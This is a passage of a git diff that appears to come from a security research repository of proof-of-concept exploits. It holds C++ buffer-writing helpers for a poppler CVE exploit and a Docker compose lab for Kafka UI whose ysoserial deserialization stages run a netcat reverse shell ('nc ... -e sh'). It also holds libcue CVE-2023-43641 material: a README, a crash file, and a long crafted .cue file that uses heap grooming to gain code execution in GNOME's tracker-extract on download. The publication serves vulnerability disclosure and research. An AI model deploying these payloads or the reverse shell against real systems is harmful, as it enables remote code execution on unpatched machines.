x, n); + pos += n; + return pos; +} + +// Write a string to starting address &buf_[pos]. +size_t WriteBuf::write_bytes_at(size_t pos, const uint8_t *bytes, size_t n) { + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= n); + memcpy(&buf_[pos], bytes, n); + pos += n; + return pos; +} + +// Write a uint8_t to starting address &buf[offset_]. +void WriteBuf::write_uint8(uint8_t x) { offset_ = write_uint8_at(offset_, x); } + +// Write a uint16_t to starting address &buf_[offset_] (in big endian +// order). +void WriteBuf::write_uint16(uint16_t x) { + offset_ = write_uint16_at(offset_, x); +} + +// Write a uint32_t to starting address &buf_[offset_] (in big endian +// order). +void WriteBuf::write_uint32(uint32_t x) { + offset_ = write_uint32_at(offset_, x); +} + +// Write a block of bytes to starting address &buf_[offset_]. +void WriteBuf::write_many(uint8_t x, size_t n) { + offset_ = write_many_at(offset_, x, n); +} + +// Write n bytes to starting address &buf_[offset_]. +void WriteBuf::write_bytes(const uint8_t *bytes, size_t n) { + offset_ = write_bytes_at(offset_, bytes, n); +} + +// Write a string to starting address &buf_[offset_]. +void WriteBuf::write_string(const char *str) { + write_bytes(reinterpret_cast(str), strlen(str)); +} + +size_t WriteBuf::offset() const { return offset_; } + +// Inserts an n-byte gap, so that the bytes can be written later. This is +// usually used for size or offset fields that need to be calculated +// later. +size_t WriteBuf::insert_gap(size_t n) { + const size_t pos = offset_; + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= n); + offset_ = pos + n; + return pos; +} + +void WriteBuf::write_to_fd(int fd) { write(fd, buf_, offset_); } + +int compress(std::vector &output, std::vector &input) { + int ret; + z_stream strm; + + strm.zalloc = nullptr; + strm.zfree = nullptr; + strm.opaque = nullptr; + + ret = deflateInit(&strm, Z_BEST_COMPRESSION); + if (ret != Z_OK) + return ret; + + size_t input_pos = 0; + size_t output_pos = 0; + + strm.avail_in = input.size(); + strm.next_in = input.data(); + output.resize(0x10000); + + while (input_pos < input.size() || strm.avail_out == 0) { + assert(input_pos <= input.size()); + assert(output_pos <= output.size()); + if (output_pos == output.size()) { + output.resize(output.size() * 2); + } + + const size_t total_avail_in = input.size() - input_pos; + const size_t avail_in = std::min(0x10000, total_avail_in); + const int flush = avail_in < total_avail_in ? Z_NO_FLUSH : Z_FINISH; + strm.avail_in = avail_in; + strm.next_in = input.data() + input_pos; + strm.avail_out = output.size() - output_pos; + strm.next_out = output.data() + output_pos; + ret = deflate(&strm, flush); + assert(ret != Z_STREAM_ERROR); + output_pos = output.size() - strm.avail_out; + input_pos += avail_in - strm.avail_in; + } + assert(strm.avail_in == 0); + assert(ret == Z_STREAM_END); + output.resize(output.size() - strm.avail_out); + + (void)deflateEnd(&strm); + return Z_OK; +} diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.h b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.h new file mode 100644 index 0000000..1e1b2a9 --- /dev/null +++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.h @@ -0,0 +1,74 @@ +#pragma once + +#include +#include +#include + +class WriteBuf { + uint8_t *buf_; + const size_t bufsize_; + size_t offset_ = 0; + +public: + WriteBuf(uint8_t *buf, size_t bufsize) : buf_(buf), bufsize_(bufsize) {} + + void reset() { offset_ = 0; } + + // Write a uint8_t to starting address &buf[pos]. + size_t write_uint8_at(size_t pos, uint8_t x); + + // Write a uint16_t to starting address &buf_[pos] (in big endian + // order). + size_t write_uint16_at(size_t pos, uint16_t x); + + // Write a uint32_t to starting address &buf_[pos] (in big endian + // order). + size_t write_uint32_at(size_t pos, uint32_t x); + + // Write a block of bytes to starting address &buf_[pos]. + size_t write_many_at(size_t pos, uint8_t x, size_t n); + + // Write a string to starting address &buf_[pos]. + size_t write_bytes_at(size_t pos, const uint8_t *bytes, size_t n); + + // Write a uint8_t to starting address &buf[offset_]. + void write_uint8(uint8_t x); + + // Write a uint16_t to starting address &buf_[offset_] (in big endian + // order). + void write_uint16(uint16_t x); + + // Write a uint32_t to starting address &buf_[offset_] (in big endian + // order). + void write_uint32(uint32_t x); + + // Write a block of bytes to starting address &buf_[offset_]. + void write_many(uint8_t x, size_t n); + + // Write n bytes to starting address &buf_[offset_]. + void write_bytes(const uint8_t *bytes, size_t n); + + // Write a string to starting address &buf_[offset_]. + void write_string(const char *str); + + size_t offset() const; + + // Inserts an n-byte gap, so that the bytes can be written later. This is + // usually used for size or offset fields that need to be calculated + // later. + size_t insert_gap(size_t n); + + void write_to_fd(int fd); +}; + +// Utility for constructing a std::vector. +template +std::vector::type> _vec(Ts &&...args) { + std::vector::type> result; + result.reserve(sizeof...(args)); + int bogus[] = {((void)result.emplace_back(std::forward(args)), 0)...}; + static_assert(sizeof(bogus) == sizeof(int) * sizeof...(args)); + return result; +} + +int compress(std::vector &output, std::vector &input); diff --git a/SecurityExploits/kafkaui/compose.yml b/SecurityExploits/kafkaui/compose.yml new file mode 100644 index 0000000..e474dba --- /dev/null +++ b/SecurityExploits/kafkaui/compose.yml @@ -0,0 +1,56 @@ +version: '3' +services: + zookeeper: + image: 'confluentinc/cp-zookeeper:7.6.1' + environment: + ZOOKEEPER_CLIENT_PORT: 2181 + + kafka: + image: 'confluentinc/cp-kafka:7.6.1' + depends_on: + - zookeeper + ports: + - 9092:9092 + environment: + KAFKA_ZOOKEEPER_CONNECT: 'zookeeper:2181' + KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka:9092 + KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT + KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT + + kafka-ui: + image: provectuslabs/kafka-ui:v0.7.1 + depends_on: + - kafka + ports: + - 8091:8080 + - 5005:5005 + environment: + KAFKA_CLUSTERS_0_NAME: local + KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS: 'kafka:9092' + KAFKA_CLUSTERS_0_ZOOKEEPER: 'zookeeper:2181' + DYNAMIC_CONFIG_ENABLED: 'true' + JAVA_TOOL_OPTIONS: '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005' + + kafka-malicious-broker: + image: 'confluentinc/cp-kafka:7.6.1' + depends_on: + - zookeeper + ports: + - 9093:9093 + environment: + KAFKA_ZOOKEEPER_CONNECT: 'zookeeper:2181' + KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://host.docker.internal:9093 + KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT + KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT + + ysoserial-stage1: + build: https://github.com/artsploit/ysoserial.git#scala1 + ports: + - 1718:1718 + entrypoint: java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1718 Scala1 "org.apache.commons.collections.enableUnsafeSerialization:true" + + ysoserial-stage2: + build: https://github.com/artsploit/ysoserial.git#scala1 + ports: + - 1719:1719 + entrypoint: java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1719 CommonsCollections7 "nc host.docker.internal 1234 -e sh" \ No newline at end of file diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/.gitignore b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/.gitignore new file mode 100644 index 0000000..c407b35 --- /dev/null +++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/.gitignore @@ -0,0 +1 @@ +mkcue diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/CVE-2023-43641-poc-simple.cue b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/CVE-2023-43641-poc-simple.cue new file mode 100644 index 0000000..d9788d9 --- /dev/null +++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/CVE-2023-43641-poc-simple.cue @@ -0,0 +1,6 @@ +FILE pwned.mp3 MP3 +TRACK 000 AUDIO +MESSAGE "simple poc for CVE-2023-43641" +INDEX 4294567296 0 +INDEX 4290967296 0 +INDEX 4254967296 0 diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/Makefile b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/Makefile new file mode 100644 index 0000000..8ea0ebc --- /dev/null +++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/Makefile @@ -0,0 +1,7 @@ +all: mkcue + +clean: + rm mkcue + +mkcue: mkcue.cpp utils.cpp utils.h + g++ -Wall -Wextra mkcue.cpp utils.cpp -o mkcue diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md new file mode 100644 index 0000000..c370f38 --- /dev/null +++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md @@ -0,0 +1,17 @@ +# CVE-2023-43641 + +This directory contains three PoCs for libcue [CVE-2023-43641](https://github.com/lipnitsk/libcue/security/advisories/GHSA-5982-x7hv-r9cj). + +The first PoC is [CVE-2023-43641-poc-simple.cue](CVE-2023-43641-poc-simple.cue). Downloading [CVE-2023-43641-poc-simple.cue](CVE-2023-43641-poc-simple.cue) should trigger the bug on most GNOME systems, because [tracker-miners](https://gitlab.gnome.org/GNOME/tracker-miners) automatically scans files in `~/Downloads`. If the filename has a `.cue` extension, then tracker-miners uses [libcue](https://github.com/lipnitsk/libcue) to scan the file. The PoC triggers an out-of-bounds array access, which causes the tracker-extract process to crash (on an unpatched system). + +The second PoC is [lunar.cue](lunar.cue), which exploits the vulnerability to pop a calculator when downloaded on an unpatched Ubuntu 23.04. Here's a [video](https://youtu.be/beOwspTnc1Y) of this PoC. + +The third PoC is [fedora38.cue](fedora38.cue), which pops a calculator when downloaded on an unpatched Fedora 38. + +The second and third PoCs are both generated by [mkcue.cpp](mkcue.cpp), which you can build and run like this: + +```bash +make +./mkcue Ubuntu23_04 > lunar.cue +./mkcue Fedora38 > fedora38.cue +``` diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/fedora38.cue b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/fedora38.cue new file mode 100644 index 0000000..37189ec --- /dev/null +++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/fedora38.cue @@ -0,0 +1,44691 @@ +PERFORMER Kev +TITLE "Kev'z Warez" +FILE pwned.mp3 MP3 + +TRACK 000 AUDIO +MESSAGE "First some [heap feng shui](https://en.wikipedia.org/wiki/Heap_feng_shui): +allocate memory so that all subsequent allocations come from a continguous block of +memory. For example, this string is 251 characters long to use a chunk from tcache +index 15." +TRACK 001 AUDIO +TITLE "A Track is 0x3a8 bytes, so creating many new tracks is a quick way to use lots of memory." +TRACK 002 AUDIO +TITLE "Again " +TRACK 003 AUDIO +TITLE "Again " +TRACK 004 AUDIO +TITLE "Again " +TRACK 005 AUDIO +TITLE "Again " +TRACK 006 AUDIO +TITLE "Again " +TRACK 007 AUDIO +TITLE "Again " +TRACK 008 AUDIO +TITLE "Again " +TRACK 009 AUDIO +TITLE "Again " +TRACK 010 AUDIO +TITLE "Again " +TRACK 011 AUDIO +TITLE "Again " +TRACK 012 AUDIO +TITLE "Again " +TRACK 013 AUDIO +TITLE "Again " +TRACK 014 AUDIO +TITLE "Again " +TRACK 015 AUDIO +TITLE "Again " +TRACK 016 AUDIO +TITLE "Again " +TRACK 017 AUDIO +TITLE "Again " +TRACK 018 AUDIO +TITLE "Again " +TRACK 019 AUDIO +TITLE "Again " +TRACK 020 AUDIO +TITLE "Again " +TRACK 021 AUDIO +TITLE "Again " +TRACK 022 AUDIO +TITLE "Again " +TRACK 023 AUDIO +TITLE "Again " +TRACK 024 AUDIO +TITLE "Again " +TRACK 025 AUDIO +TITLE "Again " +TRACK 026 AUDIO +TITLE "Again " +TRACK 027 AUDIO +TITLE "Again " +TRACK 028 AUDIO +TITLE "Again " +TRACK 029 AUDIO +TITLE "Again " +TRACK 030 AUDIO +TITLE "Again " +TRACK 031 AUDIO +TITLE "Again " +TRACK 032 AUDIO +TITLE "Again " + +TRACK 033 AUDIO +TITLE "Heap Feng Shui: empty the tcache" +COMPOSER "Allocate a chunk from tcache index 2 " +ARRANGER "Allocate a chunk from tcache index 4 " +PERFORMER "Allocate a chunk from tcache index 6 + " +SONGWRITER "Allocate a chunk from tcache index 7 + " +GENRE "Allocate a chunk from tcache index 11 + + " +MESSAGE "The goal here is to ensure that all subsequent allocations come +from a large contiguous block of memory. This string allocates a chunk from +tcache index 13. Doing this 14 times guarantees that the tcache is empty. " + +TRACK 034 AUDIO +TITLE "Copyright (c) 2023 GitHub, Inc." +COMPOSER "[GitHub Security Lab](https://securitylab.github.com/)" +ARRANGER " +This version of the poc is tuned for Fedora 38 +" +PERFORMER "[Kevin Backhouse](https://github.com/kevinbackhouse) + " +SONGWRITER " + " +GENRE "[The Malloc Maleficarum](https://seclists.org/bugtraq/2005/Oct/118). +See also: [how2heap](https://github.com/shellphish/how2heap). + " +MESSAGE "Proof-of-concept exploit for libcue CVE-2023-43641 (GHSL-2023-197): out of bounds +array access in track_set_index. The vulnerability is used to get code execution in GNOME's +tracker-extract. Download this file to pop a calc." + +TRACK 035 AUDIO +TITLE "Never Gonna Give You Up " +COMPOSER "Rick Astley " +ARRANGER " " +PERFORMER " +We're no strangers to love +You know the rules and so do I + " +SONGWRITER " +A full commitment's what I'm thinking of +You wouldn't get this from any other guy + " +GENRE " +I just want to tell you how I'm feeling +Gotta make you understand + + " +MESSAGE " +Never gonna give you up, never gonna let you down +Never gonna run around and desert you +Never gonna make you cry, never gonna say goodbye +Never gonna tell a lie and hurt you + " +TRACK 036 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 037 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 038 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 039 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 040 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 041 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 042 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 043 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 044 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 045 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 046 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 047 AUDIO +TITLE "for freeing to tcache index 1" +TITLE "free previous title" +INDEX 4294964412 4294958236 +TRACK 048 AUDIO +TITLE "Allocate previously freed string" +INDEX 4294967268 149 +INDEX 4294964230 4294958248 +TITLE "long string to overwrite low bytes of address ð " +INDEX 4294955158 69 +FILE pwned.mp3 MP3 +GENRE "set low bytes of info->file P " +TITLE "long string to overwrite low bytes of address 0 " +INDEX 4294955166 53 +FILE pwned.mp3 MP3 +PERFORMER "set low bytes of file->g_class Ð " +INDEX 4294955163 0 +TITLE "long string to overwrite low bytes of address " +INDEX 4294955226 85 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address ° " +INDEX 4294955054 69 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address " +INDEX 4294955196 277 +FILE pwned.mp3 MP3 +MESSAGE "set low bytes of tcache->entries[15] `" +MESSAGE "kevwozere" +TITLE "long string to overwrite low bytes of address Ð " +INDEX 4294955186 85 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address à " +INDEX 4294955188 949 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address 0" +INDEX 4294955198 949 +FILE pwned.mp3 MP3 +TITLE "long title to allocate 0x110-sized chunk. " +TRACK 049 AUDIO +INDEX 4294967243 0 +INDEX 4294967247 1 +INDEX 4294967254 0 +INDEX 4294967255 0 +TRACK 050 AUDIO +TITLE "Overwrite low bytes of track->file.name `" +INDEX 4294967294 277 +FILE "wen poc?" MP3 +TITLE "Overwrite low bytes of track->file.name à" +INDEX 14 949 +FILE pwned.mp3 MP3 +TITLE "Overwrite low bytes of track->file.name 0" +INDEX 24 949 +FILE pwned.mp3 MP3 +TITLE "Overwrite low bytes of track->file.name ° " +INDEX 4294967272 53 +FILE pwned.mp3 MP3 +INDEX 0 4294967295 +INDEX 1 0 +INDEX 1 1879584 +INDEX 14 0 +TRACK 051 AUDIO +FLAGS +TRACK 052 AUDIO +ISRC looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooog-string-to-allocate-0x110-sized-chunk +TITLE "long title to overwrite low bytes of track->isrc `" +INDEX 4294967294 277 +ISRC short-string +INDEX 0 4294967295 +INDEX 1 0 +INDEX 1 250512 +INDEX 4294967088 0 +INDEX 4294967090 0 +INDEX 4294967271 100 +INDEX 4294967273 0 +INDEX 4294967280 80 +TRACK 053 AUDIO +INDEX 4294963786 4294958281 +TRACK 054 AUDIO +INDEX 4294967279 0 +INDEX 4294963614 4294958241 +TRACK 055 AUDIO +INDEX 4294967282 0 +INDEX 4294963442 3837 +TITLE "Temporary long title for tcache index 6 " +TITLE "short title" +TRACK 056 AUDIO +TITLE "Use long title from tcache index 6 " +INDEX 4294967258 197 +TITLE " /bin/bash" +INDEX 4294963250 3838 +TRACK 057 AUDIO +INDEX 4294967279 25389 +INDEX 4294963078 3839 +TITLE "Temporary long title for tcache index 6 " +TITLE "eta son" +TRACK 058 AUDIO +TITLE "Use long title from tcache index 6 " +INDEX 4294967258 357 +TITLE "This command is going to get called repeatedly in an infinite loop, so send SIGSTOP to avoid a fork-bomb and use flock so only one calculator starts. killall -SIGSTOP tracker-extract-3; flock -w 3 ~/Downloads/pwned.lock -c 'gnome-calculator -e 1337' && (sleep 10; rm ~/Downloads/pwned.lock; killall -9 tracker-extract-3)" +INDEX 4294962886 4294958253 +PERFORMER "Temporary long name for tcache index 6 " +PERFORMER "short name" +TRACK 059 AUDIO +INDEX 4294962694 4586 +TITLE "Use chunk from tcache index 6 " +INDEX 4294967258 197 +TITLE "short title" +TRACK 060 AUDIO +INDEX 4294962518 4585 +TITLE " Ð " +TRACK 1337 AUDIO +INDEX 4294967290 0 +TITLE "Use the chunk that is still in tcache index 2" +MESSAGE "pop that calc  " +REM DATE "1992 AD" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 